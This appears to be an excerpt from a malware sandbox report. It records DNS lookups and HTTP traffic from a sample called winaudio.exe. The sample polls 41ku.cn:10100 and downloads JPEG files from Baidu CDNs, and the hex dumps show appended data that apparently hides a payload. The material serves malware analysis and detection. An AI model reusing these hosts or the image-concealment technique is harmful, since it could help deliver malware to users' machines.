                      Jan 30, 2023 07:40:19.756649971 CET8.8.8.8192.168.2.30xdbfeNo error (0)pic.rmb.bdstatic.compic.rmb.bdstatic.com.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:19.756649971 CET8.8.8.8192.168.2.30xdbfeNo error (0)pic.rmb.bdstatic.com.a.bdydns.comopencdnpicrmb.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:19.756649971 CET8.8.8.8192.168.2.30xdbfeNo error (0)opencdnpicrmb.jomodns.comopencdnpicrmb.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:19.756649971 CET8.8.8.8192.168.2.30xdbfeNo error (0)opencdnpicrmb.gshifen.com104.193.88.112A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:19.756649971 CET8.8.8.8192.168.2.30xdbfeNo error (0)opencdnpicrmb.gshifen.com104.193.90.80A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.152762890 CET8.8.8.8192.168.2.30xff35No error (0)pic.rmb.bdstatic.compic.rmb.bdstatic.com.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:20.152762890 CET8.8.8.8192.168.2.30xff35No error (0)pic.rmb.bdstatic.com.a.bdydns.comopencdnpicrmb.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:20.152762890 CET8.8.8.8192.168.2.30xff35No error (0)opencdnpicrmb.jomodns.comopencdnpicrmb.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:20.152762890 CET8.8.8.8192.168.2.30xff35No error (0)opencdnpicrmb.gshifen.com185.10.104.115A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.comwww.2345.com.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.216A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.217A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.212A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.215A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.214A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.218A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.213A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.344877958 CET8.8.8.8192.168.2.30x8eb5No error (0)www.2345.com.w.alikunlun.com79.133.177.211A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.comwww.2345.com.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.211A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.215A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.213A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.216A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.217A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.212A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.214A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.728574991 CET8.8.8.8192.168.2.30x6406No error (0)www.2345.com.w.alikunlun.com79.133.177.218A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.comwww.2345.com.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.214A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.215A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.216A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.211A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.218A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.213A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.212A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:23.011231899 CET8.8.8.8192.168.2.30x3ae4No error (0)www.2345.com.w.alikunlun.com79.133.177.217A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.comwww.2345.com.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.218A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.214A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.211A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.212A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.216A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.215A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.217A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.215467930 CET8.8.8.8192.168.2.30x4233No error (0)www.2345.com.w.alikunlun.com79.133.177.213A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.comwww.2345.com.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.215A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.218A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.213A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.212A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.211A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.214A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.216A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:25.250333071 CET8.8.8.8192.168.2.30xbec1No error (0)www.2345.com.w.alikunlun.com79.133.177.217A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 41ku.cn:10100

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349705103.86.67.6610100C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:11.032207966 CET117OUTGET /plusxyzs HTTP/1.1
                      Host: 41ku.cn:10100
                      Jan 30, 2023 07:40:11.243551970 CET117INHTTP/1.1 200 OK
                      Server: nginx/1.16.1
                      Date: Mon, 30 Jan 2023 06:40:11 GMT
                      Content-Type: text/plain
                      Content-Length: 230
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      Connection: keep-alive
                      ETag: "63d759af-e6"
                      Accept-Ranges: bytes
                      Jan 30, 2023 07:40:13.641254902 CET134OUTGET /plusxyzs HTTP/1.1
                      Host: 41ku.cn:10100
                      Jan 30, 2023 07:40:13.852669001 CET134INHTTP/1.1 200 OK
                      Server: nginx/1.16.1
                      Date: Mon, 30 Jan 2023 06:40:13 GMT
                      Content-Type: text/plain
                      Content-Length: 230
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      Connection: keep-alive
                      ETag: "63d759af-e6"
                      Accept-Ranges: bytes
                      Jan 30, 2023 07:40:16.331585884 CET151OUTGET /plusxyzs HTTP/1.1
                      Host: 41ku.cn:10100
                      Jan 30, 2023 07:40:16.543731928 CET152INHTTP/1.1 200 OK
                      Server: nginx/1.16.1
                      Date: Mon, 30 Jan 2023 06:40:16 GMT
                      Content-Type: text/plain
                      Content-Length: 230
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      Connection: keep-alive
                      ETag: "63d759af-e6"
                      Accept-Ranges: bytes
                      Jan 30, 2023 07:40:18.680522919 CET168OUTGET /plusxyzs HTTP/1.1
                      Host: 41ku.cn:10100
                      Jan 30, 2023 07:40:18.891633987 CET168INHTTP/1.1 200 OK
                      Server: nginx/1.16.1
                      Date: Mon, 30 Jan 2023 06:40:18 GMT
                      Content-Type: text/plain
                      Content-Length: 230
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      Connection: keep-alive
                      ETag: "63d759af-e6"
                      Accept-Ranges: bytes


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.349706104.193.88.11280C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:12.256911993 CET118OUTGET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1
                      Host:pic.rmb.bdstatic.com
                      Connection:close
                      Jan 30, 2023 07:40:12.431133032 CET120INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:12 GMT
                      Content-Type: image/jpeg
                      Content-Length: 5976
                      Connection: close
                      Expires: Thu, 02 Feb 2023 05:46:23 GMT
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      ETag: "3c7bec031bab48d4084b19b5f2a8b07b"
                      Age: 3160
                      Accept-Ranges: bytes
                      Content-MD5: PHvsAxurSNQISxm18qiwew==
                      x-bce-content-crc32: 449646581
                      x-bce-debug-id: YnOB77IblCyOGJm2i8t1xcD3n7RChwIjRofu8XPDRO2Ildh+n9qjjIGHIikmMqb/rU4uATKWOLMuzjameV5Vtw==
                      x-bce-request-id: 6819dc9d-0aa8-4efa-9ced-f0c7cec76096
                      x-bce-storage-class: STANDARD
                      Timing-Allow-Origin: *
                      Ohc-Global-Saved-Time: Mon, 30 Jan 2023 05:46:23 GMT
                      Ohc-Cache-HIT: sfo01-sys-jorcol09.sfo01.baidu.com [2], zhuzuncache59 [4], xaix67 [1]
                      Ohc-File-Size: 5976
                      X-Cache-Status: HIT
                      Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 00 8c 00 8c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 00 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 35 10 01 00 01 03 02 04 05 01 06 06 03 01 01 00 00 00 01 02 00 03 11 04 21 05 12 31 41 06 51 61 71 91 81 13 14 22 93 b1 d1 23 32 52 54 a1 c1 34 42 e1 33 f0 ff c4 00 18 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff c4 00 20 11 01 01 00 03 00 02 02 03 01 00 00 00 00 00 00 00 01 00 02 11 21 03 31 41 61 12 13 51 32 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 cf 93 c2 e4 a3 94 f9 a2 94 8c ed bd 04 4e bd 3c eb 4b 9a 72 19 c8 2e 4f 30 a5 21 1c bd 9e d9 a6 a0 a2 6f b5 1c e6 e7 3f a5 11 38 4c 54 df 1d 53 3d 69 73 2e dc 90 46 12 4f 3e 5d bd a9 3a 08 37 35 41 0b 6c d0 ce 03 38 f5 6b 4f a2 8b 28 24 ed a5 c8 b8 e5 4d c3 b3 fe 29 2e a6 1b ab f8 45 c9 e3 51 66 e0 82 8e c6 e2 1b 3f 15 a3 d3 69 ec 91 b5 67 76 2e f9 a8 26 98 8b f6 8c 08 49 5d 83 1b 77 a9 ba 78 4e d4 0e 75 51 d8 1c ed eb 52 d7 89 af 75 e5 bf c3 80 e8 18 c5 0b f7 54 63 1c 04 76 f5 a4 5a 97 39 1c 09 93 cf a5 22 e9 16 f1 3b 72
                      Data Ascii: JFIFHHC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"5!1AQaq"#2RT4B3 !1AaQ2?N<Kr.O0!o?8LTS=is.FO>]:75Al8kO($M).EQf?igv.&I]wxNuQRuTcvZ9";r
                      Jan 30, 2023 07:40:12.431159973 CET121INData Raw: 55 8b 19 39 70 fa e3 cf d6 b1 cb 77 46 01 b9 26 53 3d 56 b1 fe 2f e1 ba d9 eb 3e fd a7 b2 ce d1 0e 5b 84 51 5f 5c 75 3e 99 ad a4 20 44 37 cd 09 c0 63 94 2a 0c b4 ee a7 11 35 71 ab f3 79 b9 2d 99 50 3e 94 c3 12 2e 33 99 77 7c ab 65 e2 df b9 da 9f
                      Data Ascii: U9pwF&S=V/>[Q_\u> D7c*5qy-P>.3w|ejnJ!+4kl])S3pcojjFX{UCc[QiEJR]_k|t4S,QN/[b$%5v7-]6i$2GI+s]!q
                      Jan 30, 2023 07:40:12.431173086 CET122INData Raw: f9 6b 3c bc 7b f9 b4 c7 c9 af 8a f3 c5 bc 17 51 ce ea ac da bb 76 53 96 f8 82 a1 e5 b7 40 ac b4 74 5a c3 67 47 a8 ca ef fc 29 6d fe 2a 5b 29 1d 27 2f 96 92 ce 6e dc f3 f9 6a b1 c7 46 b7 27 3d bb d5 1e 1a 3d 5b 3c ba 3d 46 0f 3b 52 ed f4 ab 5f 0b
                      Data Ascii: k<{QvS@tZgG)m*[)'/njF'==[<=F;R_YCm0-gvpe?M]oGlcCb?3$_/WInZKr~dLdbC\n0\NXe."v_cjQ{S(
                      Jan 30, 2023 07:40:12.431191921 CET124INData Raw: b7 e0 2a 26 a7 a9 ed 5a 16 53 4b 49 7d e8 da 27 a5 13 2b ff 00 0f f8 95 e1 d6 cd 2e aa 2c f4 e2 b0 94 7a c3 3d 4c 77 2b 4f ab e2 ab a6 8d dd 3d d2 10 9c 79 a3 3c 67 23 dc ce d5 cd de b5 b4 e0 0b a9 f0 97 d9 de fc 51 b7 72 44 47 b7 7a c7 c9 80 76
                      Data Ascii: *&ZSKI}'+.,z=Lw+O=y<g#QrDGzvq}o\,szMQlH*XF'(|Q[rTLc`^wW?ZKVzzP:UJ000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:12.431204081 CET125INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:12.431221962 CET125INData Raw: b3 43 6e ba 4f fb 34 3e 4a 0a 5f 04 0c 86 7a 7b 09 e3 f5 ee 8a 50 7c 61 c0 41 09 c6 a3 e8 dd 32 e9 be 10 9a 23 23 a3 7c 65 54 50 c0 08 7d 92 a3 97 b8 a6 2b 94 3d 94 21 27 f5 65 fc 6d 7f b1 e4 e4 c6 87 0d 82 a4 0c 19 b5 32 c1 da 82 fa 03 01 ca 30
                      Data Ascii: CnO4>J_z{P|aA2##|eTP}+=!'em20O>gg4A?Ble6e!-_iGTkJ8g ._6\e%agOf.x3r<8e5LHWaUY_$l05}XF


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.349707104.193.88.10980C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:13.447882891 CET126OUTGET /tieba/pic/item/8435e5dde71190ef447aee8bc11b9d16fcfa60e4.jpg HTTP/1.1
                      Host:imgsrc.baidu.com
                      Connection:close
                      Jan 30, 2023 07:40:13.619106054 CET128INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:32 GMT
                      Content-Type: image/jpeg
                      Content-Length: 6334
                      Connection: close
                      Expires: Wed, 15 Feb 2023 08:46:11 GMT
                      Last-Modified: Sat, 03 Jan 1970 00:00:00 GMT
                      ETag: e7295ac426a0be69dc6917209f9ad193
                      Age: 1202042
                      Accept-Ranges: bytes
                      Access-Control-Allow-Origin: *
                      Ohc-Global-Saved-Time: Mon, 16 Jan 2023 08:46:11 GMT
                      Ohc-Cache-HIT: sfo01-sys-jorcol03.sfo01.baidu.com [2]
                      Ohc-Response-Time: 1 0 0 0 0 0
                      Data Raw: ff d8 ff e1 00 a9 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 1a 00 04 00 00 00 01 00 00 01 2c 01 1b 00 04 00 00 00 01 00 00 01 2c 01 28 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 31 00 02 00 00 00 13 00 00 00 54 87 69 00 04 00 00 00 01 00 00 00 6b 00 00 50 6f 6c 61 72 72 20 50 68 6f 74 6f 20 45 64 69 74 6f 72 00 00 00 00 00 04 a0 02 00 04 00 00 00 01 00 00 00 64 a0 03 00 04 00 00 00 01 00 00 00 42 a0 01 00 03 00 00 00 01 00 01 00 00 90 00 00 07 00 00 00 04 30 32 33 31 00 00 00 00 ff db 00 84 00 0a 07 07 08 07 06 0a 08 08 08 0b 0a 0a 0b 0e 18 10 0e 0d 0d 0e 1d 15 16 11 18 23 1f 25 24 22 1f 22 21 26 2b 37 2f 26 29 34 29 21 22 30 41 31 34 39 3b 3e 3e 3e 25 2e 44 49 43 3c 48 37 3d 3e 3b 01 0a 0b 0b 0e 0d 0e 1c 10 10 1c 3b 28 22 28 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b ff c0 00 11 08 00 42 00 64 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 e1 a3 77 ec 86 b0 68 e7 2e 43 3c aa 31 cd 66 e2 80 b2 97 85 07 20 d4 72 5c 5a 96 52 f1 19 40 23 ad 43 a6 fa 0c b2 b1 5b c8 32 1b 06 b1 6e 48
                      Data Ascii: ExifMM*,,(1TikPolarr Photo EditordB0231#%$""!&+7/&)4)!"0A149;>>>%.DIC<H7=>;;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;Bd}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?wh.C<1f r\ZR@#C[2nH
                      Jan 30, 2023 07:40:13.619160891 CET129INData Raw: 2c 8d 1b 58 2e 02 e2 06 67 c0 c9 c0 cd 4f 23 9a d8 36 12 e3 ed 45 3e 78 8f e2 2a 15 2b 3b b1 6a 43 10 01 72 e0 83 54 d5 de 83 2c a1 50 b9 f3 3f 3a 89 45 8e e2 34 b1 b1 fb c3 34 ac c6 43 28 42 b9 dc 2a 95 c2 e5 59 04 0e 40 24 66 9b 72 48 71 b5 f5
                      Data Ascii: ,X.gO#6E>x*+;jCrT,P?:E44C(B*Y@$frHq*bUv'[+W9jGHgZ]KX IPDNf6tBT%Sb9OHVjs{%6RW6E,{dEpG e|/],ky|N~:0.Kycy^i>/u=E
                      Jan 30, 2023 07:40:13.619210958 CET130INData Raw: 8a b4 ca e5 b1 dc 0c 7f 8d 29 26 d8 27 63 9f d6 f5 48 60 b5 fb 24 8e 46 ec 31 07 bf 35 96 22 ea 1c a8 c6 a4 8c 41 2c 4b 08 92 39 f2 ec 49 0a 5b a0 af 37 96 ef 63 3b d8 8b ed cf 6d 78 27 8d f9 18 38 cd 5c 63 75 63 d0 8c b4 4d 1d 4e 99 f6 93 67 25
                      Data Ascii: )&'cH`$F15"A,K9I[7c;mx'8\cucMNg%B=+QQ5vq<#tthO}*GmG#*YsZ&mUYU=m<q8iFvS"~+l5+.pTmRin];V6zy#SgX-
                      Jan 30, 2023 07:40:13.619257927 CET132INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:13.619306087 CET133INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                      Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                      Jan 30, 2023 07:40:13.619345903 CET133INData Raw: 4f 43 41 51 45 41 0a 6a 6f 7a 72 2b 4c 56 35 45 71 46 39 43 4c 54 70 6c 32 74 67 6b 38 7a 43 34 74 77 71 49 4b 4e 57 64 35 37 78 6c 32 32 57 51 30 78 77 50 6d 5a 6b 2f 42 57 74 71 38 63 46 41 66 6b 31 31 71 57 67 0a 53 30 73 33 74 5a 77 70 39 61
                      Data Ascii: OCAQEAjozr+LV5EqF9CLTpl2tgk8zC4twqIKNWd57xl22WQ0xwPmZk/BWtq8cFAfk11qWgS0s3tZwp9aei+kor4clcNyjmc32yr4ZXXxdttlV1DmgZa/yInrB97Pf6EqngJyeUZxcz6mVOQS9d5aBKaPLC4wtTQU+WL2tMnEWzAUoBojqx5P4jamy4DLl++t0D45TIPxZDOIDUHEcjoUOnR34NYSNYd59uu8BlDcjOqdJMe


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.349708104.193.90.8080C:\Users\user\Desktop\winaudio.exe
                      TimestampkBytes transferredDirectionData
                      Jan 30, 2023 07:40:14.826695919 CET135OUTGET /bjh/3c7bec031bab48d4084b19b5f2a8b07b.jpeg HTTP/1.1
                      Host:pic.rmb.bdstatic.com
                      Connection:close
                      Jan 30, 2023 07:40:14.996628046 CET137INHTTP/1.1 200 OK
                      Server: JSP3/2.0.14
                      Date: Mon, 30 Jan 2023 06:40:14 GMT
                      Content-Type: image/jpeg
                      Content-Length: 5976
                      Connection: close
                      Expires: Thu, 02 Feb 2023 05:46:23 GMT
                      Last-Modified: Mon, 30 Jan 2023 05:46:23 GMT
                      ETag: "3c7bec031bab48d4084b19b5f2a8b07b"
                      Age: 3049
                      Accept-Ranges: bytes
                      Content-MD5: PHvsAxurSNQISxm18qiwew==
                      x-bce-content-crc32: 449646581
                      x-bce-debug-id: YnOB77IblCyOGJm2i8t1xcD3n7RChwIjRofu8XPDRO2Ildh+n9qjjIGHIikmMqb/rU4uATKWOLMuzjameV5Vtw==
                      x-bce-request-id: 6819dc9d-0aa8-4efa-9ced-f0c7cec76096
                      x-bce-storage-class: STANDARD
                      Timing-Allow-Origin: *
                      Ohc-Global-Saved-Time: Mon, 30 Jan 2023 05:46:23 GMT
                      Ohc-Cache-HIT: iad01-sys-jomo4.iad01.baidu.com [2], zhuzuncache59 [2], xaix67 [1]
                      Ohc-File-Size: 5976
                      X-Cache-Status: HIT
